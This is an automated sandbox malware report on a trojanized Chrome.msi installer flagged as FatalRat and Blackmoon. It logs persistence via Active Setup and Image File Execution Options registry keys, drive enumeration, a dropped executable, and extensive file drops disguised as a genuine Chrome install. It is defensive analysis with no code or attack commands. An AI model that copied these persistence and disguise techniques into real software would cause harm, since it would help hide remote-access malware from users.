Malware Analysis Report

2025-03-15 03:49

Sample ID: 250221-23pn8asrdr
Target: Chrome.msi
SHA256: 1924b09ff1e25fe9d39bad70f094766863f366543658627fe94f435b07da6109
Tags: blackmoon fatalrat banker discovery infostealer persistence privilege_escalation rat spyware stealer trojan vmprotect
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral3
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 1924b09ff1e25fe9d39bad70f094766863f366543658627fe94f435b07da6109

Threat Level: Known bad

The file Chrome.msi was found to be: Known bad.

Malicious Activity Summary

Detect Blackmoon payload

Fatalrat family

FatalRat

Blackmoon, KrBanker

Blackmoon family

Fatal Rat payload

VMProtect packed file

Enumerates connected drives

Event Triggered Execution: Image File Execution Options Injection

Boot or Logon Autostart Execution: Active Setup

Checks computer location settings

Drops file in System32 directory

Event Triggered Execution: Component Object Model Hijacking

Loads dropped DLL

Drops file in Windows directory

Executes dropped EXE

Checks installed software on the system

Drops file in Program Files directory

Checks system information in the registry

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Browser Information Discovery

Reads user/profile data of web browsers

System Location Discovery: System Language Discovery

Event Triggered Execution: Installer Packages

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Delays execution with timeout.exe

Uses Volume Shadow Copy service COM API

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2025-02-21 23:06

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted: 2025-02-21 23:06

Reported: 2025-02-21 23:10

Platform: win11-20250217-en

Max time kernel: 149s

Max time network: 152s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

Blackmoon family

blackmoon

Blackmoon, KrBanker

trojan banker blackmoon

Detect Blackmoon payload


FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

Fatal Rat payload

rat infostealer

VMProtect packed file

vmprotect

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\133.0.6943.127\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable" C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TjNkNpAilaYvt.exe.log C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Checks installed software on the system

discovery

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\v8_context_snapshot.bin C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\optimization_guide_internal.dll C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ar.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ur.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\chrome_200_percent.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\fa.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\lt.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\vi.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\chrome.exe.sig C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_da.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\psuser.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\SETUP.EX_ C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\133.0.6943.127_chrome_installer.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\ca.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\el.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\fil.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\gu.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\chrome_pwa_launcher.exe C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ko.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_nl.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_sv.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\133.0.6943.127\133.0.6943.127_chrome_installer.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\chrome.7z C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\ar.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\eventlog_provider.dll C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\psmachine_64.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\bg.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\en-US.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\fi.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\he.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\th.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\VisualElements\SmallLogoDev.png C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_bn.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_te.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\ro.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\sv.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_de.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_el.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_es.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_fil.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\VisualElements\SmallLogoCanary.png C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\default_apps\external_extensions.json C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\en-GB.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\ur.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\VisualElements\LogoBeta.png C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\vulkan-1.dll C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\133.0.6943.127\Installer\setup.exe C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_hr.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\d3dcompiler_47.dll C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\fr.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\sr.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\ta.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\VisualElements\SmallLogoBeta.png C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\WidevineCdm\manifest.json C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_et.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\af.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\et.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\lv.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\Locales\zh-CN.pak C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\133.0.6943.127\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source2196_868829564\Chrome-bin\chrome_proxy.exe C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_cs.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_zh-TW.dll C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF39A7FB155A41751B.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\psuser_64.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_bg.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_fa.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_uk.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1712_2025928992\manifest.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Windows\Installer\MSICF95.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleCrashHandler.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateOnDemand.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ko.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ml.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_zh-CN.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1712_2025928992\Filtering Rules C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_fr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_lt.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_zh-TW.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ca.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_de.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_es-419.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_hr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateBroker.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\psmachine.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\Installer\e57ce7b.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ja.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_pt-PT.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ru.dll C:\ProgramData\setup\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\chrome_installer.log C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\Crashpad\metadata C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1712_2025928992\_metadata\verified_contents.json C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1712_2025928992\manifest.fingerprint C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_kn.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ta.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateComRegisterShell64.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_am.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_ar.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_it.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_sr.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdateSetup.exe C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\SystemTemp\~DFA7B22E0C069728C1.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdate.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID064.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_el.dll C:\ProgramData\setup\setup.exe N/A
